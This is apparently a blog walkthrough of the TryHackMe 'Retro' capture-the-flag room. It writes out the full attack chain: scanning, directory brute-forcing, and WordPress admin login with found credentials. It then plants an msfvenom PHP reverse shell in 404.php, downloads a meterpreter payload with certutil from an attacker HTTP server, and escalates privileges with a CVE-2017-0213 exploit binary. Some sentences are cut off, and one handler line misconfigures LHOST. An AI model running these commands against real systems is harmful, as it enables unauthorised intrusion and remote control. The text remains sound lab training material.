This walkthrough will go over the Retro room found on TryHackMe. The objective behind this room is to use a bit of passive recon to find a set of credentials in order to RDP into the box, identify a vulnerability in the
(CVE-2017-0213), and privesc to
Step 1: What's Out There?
nmap -sC -sV -p- -Pn retro.thm --min-rate=1000
Looks like we have a webserver and an RDP session open. Let's check out what the web server can offer us.
Microsoft IIS page. We'll use
ffuf to enumerate for directories.
Step 2: FFUF
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://retro.thm/FUZZ -fs 703
Nice, we discovered a directory called
/retro. Let's go to it.
Step 3: Finding Credentials
We discovered a blog that seems to be run by a username
After downloading and viewing the
Comments RSS data, we discovered text that might be a potential password.
Taking this information and plugging it into the
Site Admin link allows us to log in to the WordPress admin panel.
Step 4: Initial Foothold
Based on my experience with getting a reverse shell with WordPress, we would need to modify the
404.php file and inject our generated shell code. We can do this with
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f raw -o retro_shell.php
Now let's start initializing our handler so we can catch the shell once it executes.
set payload php/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LHOST 1337
From here we want to copy our retro_shell.php code and paste it into
404.php.We can do this by navigating to Appearance > Theme Editor > 404 Template. Delete the content of the
404.php file and paste it into your shell. Should look like this.
Now navigate to the file in your browser (http://retro.thm/retro/wp-content/themes/90s-retro/404.php) and it will drop you into a meterpreter session.
Step 5: Detour
Okay, so for some reason I could not get the meterpreter shell to stabilize with the 404.php route. But, that's alright. Sometimes we have to get creative and approach a problem from a different angle... in the end, we still get the same outcome. Root.
So what I decided to do is RDP into the box with our same credentials and upload a payload, set my handler, and catch it with a stable meterpreter session.
Generate a payload using
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o payload.exe
Start an HTTP Server and transfer it over using
certutil -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe
Now we want to set up our listener and catch the shell. Same as before with a slight modification.
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LPORT 1337
Run the payload from the victim box and drop it into a meterpreter session.
Step 6: Privesc
We're going to use the
Windows Exploit Suggester (WES) to find a way to elevate our privileges. First, we need to pull the system's information in order to pull this off.
systeminfo > sysinfo.txt
Now we can pull it down to our attack box.
From here we can use
WES to find a privesc vector (update database before running:
./windows-exploit-suggester.py --database 2023-08-07-mssb.xls --sysinfo ~/sysinfo.txt --ostext 'windows 10 64-bit' -l
This build of Windows 10 is vulnerable to a
Windows COM privesc,
CVE-2017-0213. There's a binary that we can use to automate this exploit for us. Let's download it to our attack box and upload it to our victim. Link to binary here: https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
Once we get it on our victim box we can run it and then move over to our RDP session and find a new CMD shell spawned with
NT AUTHORITY\SYSTEM rights.
Finally...this one was very difficult and time-consuming. I ended up going down multiple rabbit holes and failing at stabilizing shells more times than I'd like to admit. But all-in-all, I can say this box was rewarding and has taught me a lot about Windows privesc. I hope you enjoyed this walkthrough, and as always, Happy Hacking.